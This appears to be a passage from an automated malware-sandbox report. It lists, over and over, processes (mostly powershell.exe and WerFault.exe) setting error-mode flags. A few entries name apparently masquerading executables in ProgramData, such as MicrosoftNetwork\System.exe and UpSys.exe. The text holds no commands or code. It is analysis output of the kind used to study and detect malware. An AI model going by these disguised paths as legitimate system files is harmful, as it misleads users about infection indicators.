Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\ProgramData\Systemd\procexp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\ProgramData\MicrosoftNetwork\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\ProgramData\MicrosoftNetwork\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\UpSys.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\UpSys.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\UpSys.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\UpSys.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
